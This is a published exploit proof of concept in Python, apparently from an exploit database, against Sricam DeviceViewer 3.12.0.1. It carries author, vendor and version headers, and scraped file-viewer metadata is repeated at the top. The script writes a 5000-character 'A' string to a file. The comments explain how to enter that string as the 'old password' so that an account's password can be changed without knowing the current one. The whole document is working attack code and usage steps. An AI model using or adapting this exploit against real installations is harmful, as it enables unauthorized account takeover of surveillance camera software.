33 lines
No EOL
1.2 KiB
Python
Executable file
33 lines
No EOL
1.2 KiB
Python
Executable file
# Exploit Title: DeviceViewer 3.12.0.1 - Arbitrary Password Change
|
|
# Date: 2019-09-10
|
|
# Exploit Author: Alessandro Magnosi
|
|
# Vendor Homepage: http://www.sricam.com/
|
|
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
|
|
# Version: v3.12.0.1
|
|
# Tested on: Windows 7
|
|
|
|
#!/usr/bin/python
|
|
|
|
# Steps to reproduce:
|
|
# 1. Generate the payload executing the PoC
|
|
# 2. Login in the Sricam DeviceViewer application as any registered user
|
|
# 3. Go to System Tools -> Change Password
|
|
# 4. Set the old password as the malicious payload, and the new password as whatever you want
|
|
# 5. The password will be changed with the new one
|
|
# 6. To confirm, restart the application and try to login with the new password
|
|
|
|
payload = "A" * 5000
|
|
|
|
try:
|
|
bypass = open("bypass.txt","w")
|
|
print("### Sricam DeviceViewer 3.12.0.1 Change Password Security Bypass")
|
|
print("### Author: Alessandro Magnosi\n")
|
|
print("[*] Creating old password file")
|
|
bypass.write(payload)
|
|
bypass.close()
|
|
print("[+] Old password file created\n")
|
|
print("[i] When changing password, set the old password to the file contents")
|
|
print("[i] Close the program and reopen it")
|
|
print("[i] Log in with new password")
|
|
except:
|
|
print("[!] Error creating the file") |